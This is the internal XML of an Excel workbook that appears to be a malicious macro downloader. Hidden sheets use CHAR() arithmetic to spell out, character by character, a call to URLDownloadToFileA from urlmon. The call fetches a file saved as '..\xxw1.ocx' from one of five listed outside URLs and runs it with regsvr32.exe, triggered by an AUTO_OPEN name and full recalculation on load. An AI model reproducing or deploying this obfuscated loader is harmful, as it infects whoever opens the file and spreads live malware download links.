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firstSheet="1" activeTab="1"/>
  </bookViews>
  <sheets>
    <sheet name="Grrr1" sheetId="1" state="hidden" r:id="rId1"/>
    <sheet name="Sheet" sheetId="2" r:id="rId2"/>
    <sheet name="Sbrr1" sheetId="3" state="hidden" r:id="rId3"/>
  </sheets>
  <definedNames>
    <definedName name="_xlfn.ARABIC" hidden="1">#NAME?</definedName>
    <definedName name="DDDDD1">#REF!</definedName>
    <definedName name="DDWD">'EFWFSFG'!$D$15</definedName>
    <definedName name="DDWD1">'EFWFSFG'!$D$17</definedName>
    <definedName name="DDWD2">'EFWFSFG'!$D$19</definedName>
    <definedName name="DDWD3">'EFWFSFG'!$D$21</definedName>
    <definedName name="DDWD4">'EFWFSFG'!$D$23</definedName>
    <definedName name="DDWD8">'EFWFSFG'!$D$13</definedName>
    <definedName name="KKLD8">#REF!</definedName>
    <definedName name="AUTO_OPEN">'EFWFSFG'!$D$1</definedName>
  </definedNames>
  <calcPr fullCalcOnLoad="1"/>
</workbook>
</file>

<file path=xl/sharedStrings.xml><?xml version="1.0" encoding="utf-8"?>
<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="12" uniqueCount="12">
  <si>
    <t>\Windows\</t>
  </si>
  <si>
    <t>SysWow64\</t>
  </si>
  <si>
    <t>G</t>
  </si>
  <si>
    <t>!</t>
  </si>
  <si>
    <t>e</t>
  </si>
  <si>
    <t>regsvr32.exe</t>
  </si>
  <si>
    <t>/</t>
  </si>
  <si>
    <t>"https://duvarkagitlarimodelleri.com/42hhp/gZXakh7/","</t>
  </si>
  <si>
    <t>"https://dolphinwavehavuzrobotu.com/wp-includes/RmCbvIKjjtlB3tabyPo/","</t>
  </si>
  <si>
    <t>"http://animalsandusfujairah.com/wp-admin/JWO58zeUOwSI/","</t>
  </si>
  <si>
    <t>"https://havuzkaydiraklari.com/wp-includes/YqYdLFA/","</t>
  </si>
  <si>
    <t>"http://vipwatchpay.com/Isoetales/5wy8L0TQ1xCZEr/","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</si>
</sst>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4C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247650</xdr:colOff>
      <xdr:row>6</xdr:row>
      <xdr:rowOff>9525</xdr:rowOff>
    </xdr:to>
    <xdr:pic>
      <xdr:nvPicPr>
        <xdr:cNvPr id="1" name="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zoomScalePageLayoutView="0" workbookViewId="0" topLeftCell="A1">
      <selection activeCell="A2" sqref="A2"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="9.140625" defaultRowHeight="15"/>
  <sheetData>
    <row r="2" spans="5:12" ht="15">
      <c r="E2" t="str">
        <f>CHAR(113-2)</f>
        <v>o</v>
      </c>
      <c r="G2" t="str">
        <f>CHAR(111-6)</f>
        <v>i</v>
      </c>
      <c r="L2" t="str">
        <f>CHAR(71-6)</f>
        <v>A</v>
      </c>
    </row>
    <row r="3" spans="3:16" ht="15">
      <c r="C3" t="str">
        <f>CHAR(111+3)</f>
        <v>r</v>
      </c>
      <c r="I3" t="str">
        <f>CHAR(87-4)</f>
        <v>S</v>
      </c>
      <c r="P3" t="str">
        <f>CHAR(90+2)</f>
        <v>\</v>
      </c>
    </row>
    <row r="4" spans="6:14" ht="15">
      <c r="F4" t="str">
        <f>CHAR(100-18)</f>
        <v>R</v>
      </c>
      <c r="H4" t="str">
        <f>CHAR(110-9)</f>
        <v>e</v>
      </c>
      <c r="K4">
        <v>1</v>
      </c>
      <c r="N4" t="str">
        <f>CHAR(89-1)</f>
        <v>X</v>
      </c>
    </row>
    <row r="5" spans="2:16" ht="15">
      <c r="B5" t="str">
        <f>CHAR(115+2)</f>
        <v>u</v>
      </c>
      <c r="P5" t="str">
        <f>CHAR(44+2)</f>
        <v>.</v>
      </c>
    </row>
    <row r="6" spans="5:10" ht="15">
      <c r="E6" t="str">
        <f>CHAR(90-6)</f>
        <v>T</v>
      </c>
      <c r="J6" t="str">
        <f>CHAR(77-3)</f>
        <v>J</v>
      </c>
    </row>
    <row r="7" spans="4:16" ht="15">
      <c r="D7" t="str">
        <f>CHAR(107+3)</f>
        <v>n</v>
      </c>
      <c r="F7">
        <v>3</v>
      </c>
      <c r="M7" t="str">
        <f>CHAR(117-2)</f>
        <v>s</v>
      </c>
      <c r="P7" t="str">
        <f>CHAR(41+3)</f>
        <v>,</v>
      </c>
    </row>
    <row r="9" spans="3:16" ht="15">
      <c r="C9" t="str">
        <f>CHAR(110-2)</f>
        <v>l</v>
      </c>
      <c r="H9" t="str">
        <f>CHAR(70-3)</f>
        <v>C</v>
      </c>
      <c r="K9" t="str">
        <f>CHAR(55-7)</f>
        <v>0</v>
      </c>
      <c r="P9" t="str">
        <f>CHAR(55+5)</f>
        <v>&lt;</v>
      </c>
    </row>
    <row r="10" ht="15">
      <c r="F10" t="str">
        <f>CHAR(123-4)</f>
        <v>w</v>
      </c>
    </row>
    <row r="11" spans="5:16" ht="15">
      <c r="E11" t="str">
        <f>CHAR(80+5)</f>
        <v>U</v>
      </c>
      <c r="J11" t="str">
        <f>CHAR(80-7)</f>
        <v>I</v>
      </c>
      <c r="L11" t="str">
        <f>CHAR(100-1)</f>
        <v>c</v>
      </c>
      <c r="P11" t="str">
        <f>CHAR(35+5)</f>
        <v>(</v>
      </c>
    </row>
    <row r="12" ht="15">
      <c r="A12" t="str">
        <f>CHAR(107+2)</f>
        <v>m</v>
      </c>
    </row>
    <row r="13" spans="4:16" ht="15">
      <c r="D13" t="str">
        <f>CHAR(72-4)</f>
        <v>D</v>
      </c>
      <c r="H13" t="str">
        <f>CHAR(68+1)</f>
        <v>E</v>
      </c>
      <c r="N13">
        <v>2</v>
      </c>
      <c r="P13" t="str">
        <f>CHAR(36+5)</f>
        <v>)</v>
      </c>
    </row>
    <row r="14" spans="7:11" ht="15">
      <c r="G14" t="str">
        <f>CHAR(124-4)</f>
        <v>x</v>
      </c>
      <c r="K14" t="str">
        <f>CHAR(70-4)</f>
        <v>B</v>
      </c>
    </row>
    <row r="15" spans="2:16" ht="15">
      <c r="B15" t="str">
        <f>CHAR(80-4)</f>
        <v>L</v>
      </c>
      <c r="F15" t="str">
        <f>CHAR(105-5)</f>
        <v>d</v>
      </c>
      <c r="P15" t="str">
        <f>CHAR(31+3)</f>
        <v>"</v>
      </c>
    </row>
    <row r="17" spans="4:16" ht="15">
      <c r="D17" t="str">
        <f>CHAR(102-5)</f>
        <v>a</v>
      </c>
      <c r="I17" t="str">
        <f>CHAR(78+1)</f>
        <v>O</v>
      </c>
      <c r="K17" t="s">
        <v>2</v>
      </c>
      <c r="P17" t="str">
        <f>CHAR(40-2)</f>
        <v>&amp;</v>
      </c>
    </row>
    <row r="18" ht="15">
      <c r="B18" t="str">
        <f>CHAR(65+5)</f>
        <v>F</v>
      </c>
    </row>
    <row r="19" ht="15">
      <c r="P19" t="str">
        <f>CHAR(32)</f>
        <v> </v>
      </c>
    </row>
    <row r="20" spans="8:16" ht="15">
      <c r="H20">
        <v>8</v>
      </c>
      <c r="P20" t="str">
        <f>CHAR(52+6)</f>
        <v>:</v>
      </c>
    </row>
    <row r="22" ht="15">
      <c r="P22" t="str">
        <f>CHAR(66-5)</f>
        <v>=</v>
      </c>
    </row>
    <row r="23" ht="15">
      <c r="K23" t="str">
        <f>CHAR(80-2)</f>
        <v>N</v>
      </c>
    </row>
    <row r="24" spans="7:16" ht="15">
      <c r="G24" t="str">
        <f>CHAR(84-2)</f>
        <v>R</v>
      </c>
      <c r="P24" t="s">
        <v>3</v>
      </c>
    </row>
    <row r="26" ht="15">
      <c r="I26" t="str">
        <f>CHAR(84)</f>
        <v>T</v>
      </c>
    </row>
    <row r="27" ht="15">
      <c r="P27" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="32" ht="15">
      <c r="I32">
        <f>_xlfn.ARABIC("CXI")</f>
        <v>111</v>
      </c>
    </row>
    <row r="33" ht="15">
      <c r="O33">
        <f>_xlfn.ARABIC("LXVII")</f>
        <v>67</v>
      </c>
    </row>
    <row r="35" ht="15">
      <c r="E35">
        <f>_xlfn.ARABIC("LXI")</f>
        <v>61</v>
      </c>
    </row>
    <row r="36" ht="15">
      <c r="Q36">
        <f>_xlfn.ARABIC("CXIV")</f>
        <v>114</v>
      </c>
    </row>
    <row r="37" ht="15">
      <c r="K37">
        <f>_xlfn.ARABIC("CI")</f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sheetData>
    <row r="1" s="1" customFormat="1" ht="15.75" customHeight="1"/>
    <row r="2" s="1" customFormat="1" ht="15.75" customHeight="1"/>
    <row r="3" s="1" customFormat="1" ht="15.75" customHeight="1"/>
    <row r="4" s="2" customFormat="1" ht="15.75" customHeight="1"/>
    <row r="5" s="2" customFormat="1" ht="15.75" customHeight="1"/>
    <row r="6" s="2" customFormat="1" ht="15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3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T2" t="s">
        <v>0</v>
      </c>
    </row>
    <row r="3" spans="4:10" ht="15">
      <c r="D3" t="str">
        <f>T(Grrr1!C9&amp;Grrr1!A12&amp;Grrr1!E2&amp;Grrr1!D7&amp;Grrr1!P15&amp;Grrr1!P7&amp;Grrr1!P15&amp;Grrr1!E11&amp;Grrr1!F4&amp;Grrr1!B15&amp;Grrr1!D13)</f>
        <v>lmon","URLD</v>
      </c>
      <c r="J3" t="str">
        <f>T(Grrr1!P7&amp;Grrr1!K9&amp;Grrr1!P7)</f>
        <v>,0,</v>
      </c>
    </row>
    <row r="4" ht="15">
      <c r="R4" t="str">
        <f>T(Grrr1!P19&amp;Grrr1!P5&amp;Grrr1!P5&amp;Grrr1!P3&amp;Grrr1!G14&amp;Grrr1!G14&amp;Grrr1!F10&amp;Grrr1!K4&amp;Grrr1!P5&amp;Grrr1!E2&amp;Grrr1!L11&amp;Grrr1!G14)</f>
        <v> ..\xxw1.ocx</v>
      </c>
    </row>
    <row r="5" ht="15">
      <c r="F5" t="str">
        <f>T(Grrr1!B18&amp;Grrr1!G2&amp;Grrr1!C9)</f>
        <v>Fil</v>
      </c>
    </row>
    <row r="6" ht="15">
      <c r="M6" t="str">
        <f>T(Grrr1!P7&amp;Grrr1!K9&amp;Grrr1!P7&amp;Grrr1!K9&amp;Grrr1!P13)</f>
        <v>,0,0)</v>
      </c>
    </row>
    <row r="7" ht="15">
      <c r="P7" t="s">
        <v>1</v>
      </c>
    </row>
    <row r="8" ht="15">
      <c r="H8" t="str">
        <f>T(Grrr1!L2&amp;Grrr1!P15&amp;Grrr1!P7&amp;Grrr1!P15&amp;Grrr1!J6&amp;Grrr1!J6&amp;Grrr1!H9&amp;Grrr1!H9)</f>
        <v>A","JJCC</v>
      </c>
    </row>
    <row r="10" ht="15">
      <c r="B10" t="str">
        <f>T(Grrr1!P11&amp;Grrr1!P15&amp;Grrr1!B5&amp;Grrr1!C3)</f>
        <v>("ur</v>
      </c>
    </row>
    <row r="11" ht="15">
      <c r="J11" t="str">
        <f>T(Grrr1!P9&amp;Grrr1!K9&amp;Grrr1!P7&amp;Grrr1!P19)</f>
        <v>&lt;0, </v>
      </c>
    </row>
    <row r="12" ht="15">
      <c r="G12" t="str">
        <f>T(Grrr1!K14&amp;Grrr1!K14&amp;Grrr1!P15)</f>
        <v>BB"</v>
      </c>
    </row>
    <row r="14" ht="15">
      <c r="P14" t="str">
        <f>T(Grrr1!P5&amp;Grrr1!P5&amp;Grrr1!P3&amp;Grrr1!G14&amp;Grrr1!G14&amp;Grrr1!F10&amp;Grrr1!K4&amp;Grrr1!P5&amp;Grrr1!E2&amp;Grrr1!L11&amp;Grrr1!G14&amp;Grrr1!P15)</f>
        <v>..\xxw1.ocx"</v>
      </c>
    </row>
    <row r="15" ht="15">
      <c r="C15" t="str">
        <f>T(Grrr1!E2&amp;Grrr1!F10&amp;Grrr1!D7&amp;Grrr1!C9&amp;Grrr1!E2&amp;Grrr1!D17&amp;Grrr1!F15&amp;Grrr1!E6&amp;Grrr1!E2)</f>
        <v>ownloadTo</v>
      </c>
    </row>
    <row r="18" ht="15">
      <c r="N18" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="24" ht="15">
      <c r="F24" t="s">
        <v>7</v>
      </c>
    </row>
    <row r="26" ht="15">
      <c r="G26" t="s">
        <v>8</v>
      </c>
    </row>
    <row r="28" ht="15">
      <c r="H28" t="s">
        <v>9</v>
      </c>
    </row>
    <row r="30" ht="15">
      <c r="I30" t="s">
        <v>10</v>
      </c>
    </row>
    <row r="32" ht="15">
      <c r="J32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2015-06-05T18:19:34Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-02-23T11:53:58Z</dcterms:modified>
  <cp:category/>
  <cp:version/>
  <cp:contentType/>
  <cp:contentStatus/>
</cp:coreProperties>
</file>